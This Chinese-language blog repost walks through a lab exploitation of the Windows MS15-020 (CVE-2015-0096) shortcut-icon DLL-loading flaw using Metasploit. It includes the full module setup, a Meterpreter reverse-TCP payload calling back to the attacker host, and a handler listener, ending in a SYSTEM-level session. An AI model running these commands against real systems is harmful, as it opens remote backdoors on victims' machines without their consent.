MS15-020漏洞测试

admin 2022年1月16日13:22:55安全文章评论26 views1134字阅读3分46秒阅读模式
名称:Microsoft DLL植入远程代码执行漏洞(CVE-2015-0096)(MS15-020)

了解:Microsoft Windows没有正确处理DLL文件的加载,存在远程代码执行漏洞,通过诱使用户打开远程WebDAV或SMB共享上的某些文件利用此漏洞,

成功利用后可导致加载任意库。Windows使用.lnk来定义文件或者目录的快捷方式,可以使用.CPL文件来自定义图标。问题是,在Windows中,图标从模块(或者可执行文件或动态链接库)加载。

事实上,.cpl文件实际上是DLL文件。因为攻击者可以定义哪些可执行模块会被加载,攻击者可以利用.LNK文件来执行任意代码。


实验环境:


共享主机win7:192.168.1.3
入侵主机linux:192.168.1.7
受害者主机XP:192.168.10


打开终端输入命令:


msfconsole    //启动msf(metasploit framework)


search ms15  //搜索关键字相关漏洞


use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader  //漏洞利用模块


info //查看漏洞相关信息


set payload windows/meterpreter/reverse_tcp     //设置一个反弹shell


MS15-020漏洞测试


设置好参数,设置漏洞利用模块列表的UNCHOST和UNCSHARE

set UNCHOST 192.168.1.3  //我设置为我的另一台主机地址 就是你开着共享那台机器的地址

set UNCSHARE share       //设置共享文件的文件夹 这里主机192.168.1.3在C盘下的share里文件夹开启了共享 提前创建好共享

set LHOST 192.168.1.7   //设置漏洞成功利用后后门连接的地址

exploit  //执行漏洞


MS15-020漏洞测试


exploit后会发现生成了几个文件,我们去生成的目录下把文件拷贝到共享主机的共享文件夹下


MS15-020漏洞测试


复制到共享主机后,在启动MSF进行配置刚才的后门进行监听...输入命令

1.  use exploit/multi/handler

2.  set payload windows/meterpreter/reverse_tcp

3. set LHOST 192.168.1.7

4. exploit


MS15-020漏洞测试


受害者访问共享后,

成功了触发了漏洞


MS15-020漏洞测试


可以发现入侵者这边弹回来了一个回话session 1,简单点说就是一个后门,这里我顺便提了下权,可以看见system权限。

实验结束,下班,关门,回家。

作者:We3sT
原文链接:https://www.cnblogs.com/hkleak/p/5435890.html

原文始发于微信公众号(天驿安全):MS15-020漏洞测试

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月16日13:22:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  MS15-020漏洞测试 http://cn-sec.com/archives/739317.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: